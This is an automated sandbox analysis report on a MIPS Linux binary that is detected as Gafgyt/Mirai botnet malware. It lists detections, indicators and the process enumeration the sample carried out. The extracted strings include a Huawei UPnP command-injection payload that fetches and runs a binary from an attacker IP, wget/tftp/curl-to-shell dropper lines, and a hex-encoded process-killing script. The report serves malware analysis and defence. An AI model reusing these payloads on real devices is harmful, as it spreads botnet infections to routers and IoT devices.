Linux Analysis Report
bin.mipsel.elf

Overview

General Information

Sample name: bin.mipsel.elf
Analysis ID: 1538208
MD5: 25b7df65636b6205023e1f8a1410025b
SHA1: c92a5fef6214a7c84c0327e7cce63254a46be4c9
SHA256: d27aed220d88d7173e5b738c58d6316aaa0d0ad67e0b0f6d8a9702bf75e28403
Tags: elfuser-abuse_ch
Infos:

Detection

Gafgyt, Mirai
Score: 80
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Gafgyt
Yara detected Mirai
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Name Description Attribution Blogpost URLs Link
Bashlite, Gafgyt Bashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite
Name Description Attribution Blogpost URLs Link
Mirai Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

AV Detection

barindex
Source: bin.mipsel.elf Avira: detected
Source: bin.mipsel.elf ReversingLabs: Detection: 47%
Source: bin.mipsel.elf String: Killed process %d (path: %s) because it matched kill string "%s" in path_kill_strings.Killed process %d (command line: %s) because it matched kill string "%s" in cmdline_kill_strings./proc/%d/stat%dMUSHI_KILLER/proc/root/tmp/varcurlwgetftpscp
Source: bin.mipsel.elf String: /bin/busyboxenableshellshlinuxshellping ;shusage: busyboxreps.check-host.co/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | shGET /dlr. HTTP/1.0
Source: global traffic TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: bin.mipsel.elf String found in binary or memory: http:///curl.sh
Source: bin.mipsel.elf String found in binary or memory: http:///wget.sh
Source: bin.mipsel.elf String found in binary or memory: http://178.215.238.13/bin.armv4l;chmod
Source: bin.mipsel.elf String found in binary or memory: http://178.215.238.13/bin.armv7l;chmod
Source: bin.mipsel.elf String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: bin.mipsel.elf String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
Source: Initial sample String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 178.215.238.13 -l /tmp/.unstable -r /bin.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.rep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample String containing 'busybox' found: /bin/busybox
Source: Initial sample String containing 'busybox' found: usage: busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox hostname PBOC
Source: Initial sample String containing 'busybox' found: /bin/busybox echo >
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sample String containing 'busybox' found: /bin/busybox wget http://
Source: Initial sample String containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
Source: Initial sample String containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
Source: Initial sample String containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
Source: Initial sample String containing 'busybox' found: /bin/busyboxenableshellshlinuxshellping ;shusage: busyboxreps.check-host.co/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | shGET /dlr. HTTP/1.0
Source: Initial sample String containing 'busybox' found: > .d/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrepThe People's/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4(
Source: ELF static info symbol of initial sample .symtab present: no
Source: classification engine Classification label: mal80.troj.linELF@0/0@0/0
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/1582/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/1582/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/3088/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/3088/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/230/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/230/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/110/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/110/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/231/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/231/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/111/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/111/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/232/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/232/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/1579/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/1579/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/112/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/112/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/233/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/233/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/1699/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/1699/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/113/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/113/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/234/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/234/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/1335/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/1335/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/1698/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/1698/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/114/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/114/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/235/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/235/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/1334/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/1334/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/1576/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/1576/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/2302/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/2302/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/115/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/115/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/236/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/236/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/116/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/116/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/237/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/237/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/117/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/117/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/118/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/118/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/910/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/910/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/119/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/119/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/912/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/912/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/10/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/10/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/2307/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/2307/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/11/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/11/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/918/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/918/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/12/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/12/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/13/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/13/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/14/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/14/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/15/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/15/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/16/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/16/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/17/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/17/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/18/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/18/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/6246/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/6246/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/1594/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/1594/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/120/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/120/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/121/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/121/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/1349/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/1349/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/1/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/1/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/122/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/122/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/243/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/243/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/123/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/123/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/2/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/2/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/124/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/124/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/3/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/3/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/4/stat Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) File opened: /proc/4/cmdline Jump to behavior
Source: /tmp/bin.mipsel.elf (PID: 6237) Queries kernel information via 'uname': Jump to behavior
Source: bin.mipsel.elf, 6237.1.0000562a2b10f000.0000562a2b1b6000.rw-.sdmp, bin.mipsel.elf, 6261.1.0000562a2b10f000.0000562a2b1b6000.rw-.sdmp, bin.mipsel.elf, 6263.1.0000562a2b10f000.0000562a2b1b6000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/mipsel
Source: bin.mipsel.elf, 6237.1.00007fff5f00c000.00007fff5f02d000.rw-.sdmp, bin.mipsel.elf, 6261.1.00007fff5f00c000.00007fff5f02d000.rw-.sdmp, bin.mipsel.elf, 6263.1.00007fff5f00c000.00007fff5f02d000.rw-.sdmp Binary or memory string: )x86_64/usr/bin/qemu-mipsel/tmp/bin.mipsel.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/bin.mipsel.elf
Source: bin.mipsel.elf, 6237.1.00007fff5f00c000.00007fff5f02d000.rw-.sdmp, bin.mipsel.elf, 6261.1.00007fff5f00c000.00007fff5f02d000.rw-.sdmp, bin.mipsel.elf, 6263.1.00007fff5f00c000.00007fff5f02d000.rw-.sdmp Binary or memory string: /usr/bin/qemu-mipsel
Source: bin.mipsel.elf, 6237.1.0000562a2b10f000.0000562a2b1b6000.rw-.sdmp, bin.mipsel.elf, 6261.1.0000562a2b10f000.0000562a2b1b6000.rw-.sdmp, bin.mipsel.elf, 6263.1.0000562a2b10f000.0000562a2b1b6000.rw-.sdmp Binary or memory string: +*V!/etc/qemu-binfmt/mipsel

Stealing of Sensitive Information

barindex
Source: Yara match File source: bin.mipsel.elf, type: SAMPLE
Source: Yara match File source: 6237.1.00007f4494400000.00007f449443b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6261.1.00007f4494400000.00007f449443b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6263.1.00007f4494400000.00007f449443b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: bin.mipsel.elf, type: SAMPLE
Source: Yara match File source: 6237.1.00007f4494400000.00007f449443b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6261.1.00007f4494400000.00007f449443b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6263.1.00007f4494400000.00007f449443b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: bin.mipsel.elf PID: 6237, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: bin.mipsel.elf PID: 6261, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: bin.mipsel.elf PID: 6263, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: bin.mipsel.elf, type: SAMPLE
Source: Yara match File source: 6237.1.00007f4494400000.00007f449443b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6261.1.00007f4494400000.00007f449443b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6263.1.00007f4494400000.00007f449443b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: bin.mipsel.elf, type: SAMPLE
Source: Yara match File source: 6237.1.00007f4494400000.00007f449443b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6261.1.00007f4494400000.00007f449443b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6263.1.00007f4494400000.00007f449443b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: bin.mipsel.elf PID: 6237, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: bin.mipsel.elf PID: 6261, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: bin.mipsel.elf PID: 6263, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs